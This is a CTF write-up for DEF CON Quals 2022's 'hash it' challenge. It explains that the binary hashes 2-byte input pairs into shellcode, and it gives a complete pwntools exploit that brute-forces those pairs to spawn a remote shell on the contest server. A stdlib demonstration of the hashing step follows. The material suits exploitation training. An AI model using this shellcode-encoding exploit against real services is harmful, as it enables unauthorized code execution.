
defconquals22.md

### hash it
literally the only "normal" chall in this ctf lmfao all of the other ones are obscure architectures, weird custom implementations, way too new versions for existing tooling to support it yadayada
(ok maybe aside from not too advanced but still)
either way x86-64 ELF, reads in 4 bytes as the size for malloc then reads in the amount of bytes specified as data
does some hashing with a pointer array for 4 algorithms, then ends up jumping to the malloc'd address which is rwx'd
looking closer at the read loops, turns out it's reading 2 bytes at a time, hashing them with the rotating algorithms and fetching 1 byte from the digest to construct the shellcode to jump to
quickly wrote a reimplementation in python to check if it's really just that, which ended up matching every byte aside from the first byte
turns out it was the newline char from me using the console manually lmao
either way with that since we are only dealing with pairs of bytes a good ol brute force would work for constructing the wanted shellcode
with some wackiness out of the way like using the wrong architecture for shellcode (oops) we can get a shell pretty easily
```py
from pwn import *
from Crypto.Hash import MD5, SHA1, SHA256, SHA512

payload = b''
# the binary rotates through these four algorithms, one per input pair
algos = [MD5, SHA1, SHA256, SHA512]
#dont forget to set context or else you get 32 bits :)
context.binary = ELF('./zc7ejjq9ehhcqj1x61ekoa8pjtk7')
targetshellcode = asm(shellcraft.sh())
# targetshellcode = b'jhH\xb8/bin///sPH\x89\xe7hri\x01\x01\x814$\x01\x01\x01\x011\xf6Vj\x08^H\x01\xe6VH\x89\xe61\xd2j;X\x0f\x05'
print(targetshellcode)

# for every wanted output byte, brute force a 2-byte input whose digest starts with it
for i in range(0, len(targetshellcode)*2, 2):
    for test in range(0x10000):  # all 65536 pairs (0xFFFF would skip the last one)
        pair = int.to_bytes(test, byteorder='little', length=2)
        algo = algos[(i // 2 % 4)]
        h = algo.new()
        h.update(pair)
        if h.digest()[0] == targetshellcode[i//2]:
            payload += pair
            print(payload)
            break
    else:
        # no pair produced this byte, the payload would be silently short
        raise ValueError('no pair found for byte %d' % (i // 2))
print('final:', payload)
# payload = b'I\x00\x03\x00n\x00\x13\x00\xc2\x00\x80\x00\x11\x03[\x01\xc2\x006\x00<\x01\xea\x02x\x00\xf4\x01Z\x00r\x00\x88\x00<\x00\x11\x03A\x00n\x01\x8d\x00\x9a\x00\x84\x00n\x01\xc5\x00u\x00A\x00]\x00\xc3\x01C\x04U\x01\x90\x00\t\x01n\x00A\x00\xb7\x00\xdb\x00n\x00\x12\x00\xb7\x00\xd5\x01=\x01U\x01\xef\x00X\x02b\x01\x0e\x00'

#remote
p = remote('hash-it-0-m7tt7b7whagjw.shellweplayaga.me', 31337)
p.recvuntil(b'Ticket please:')
p.sendline(rb'ticket{GangwayBoom2757n22:JPhP0TDldX6nhNGrjRYeXtC4eCTXxx6HWFyb8oUl55JtIl0M}')
#local
# p = process([context.binary.path])
# import time
# time.sleep(10)

# 4-byte big-endian length first, then the pairs
p.send(int.to_bytes(len(payload), byteorder='big', length=4))
p.send(payload)
p.interactive()
```
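An added example, not part of the original write-up or the challenge binary: a stdlib-only model of the read loop as described above (2 input bytes in, first digest byte out, algorithms rotating in the order the solver uses), plus a check of why the hashing filters nothing. The function names and the sample input are made up for illustration.

```python
import hashlib

# Rotation order taken from the solver on this page: MD5, SHA1, SHA256, SHA512.
ALGOS = ("md5", "sha1", "sha256", "sha512")


def transform(data: bytes) -> bytes:
    """Model of the read loop as described: every 2 input bytes give 1 output byte."""
    if len(data) % 2:
        raise ValueError("input must be a whole number of 2-byte pairs")
    out = bytearray()
    for i in range(0, len(data), 2):
        algo = ALGOS[(i // 2) % len(ALGOS)]
        # Assumption from the solver above: the kept byte is digest[0].
        out.append(hashlib.new(algo, data[i:i + 2]).digest()[0])
    return bytes(out)


def coverage() -> dict:
    """For each algorithm, count distinct output bytes over all 65536 pairs."""
    result = {}
    for algo in ALGOS:
        seen = {hashlib.new(algo, n.to_bytes(2, "little")).digest()[0]
                for n in range(0x10000)}
        result[algo] = len(seen)
    return result


if __name__ == "__main__":
    sample = bytes(range(8))  # constructed input: four pairs, one per algorithm
    print(transform(sample).hex())
    # 256 for every algorithm means any output byte is reachable at any position,
    # so the hash step puts no constraint on what ends up in the rwx buffer.
    print(coverage())
```

With 65536 inputs mapping onto 256 outputs, each output byte has roughly 256 preimages per algorithm, which is why the brute force above finishes instantly.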
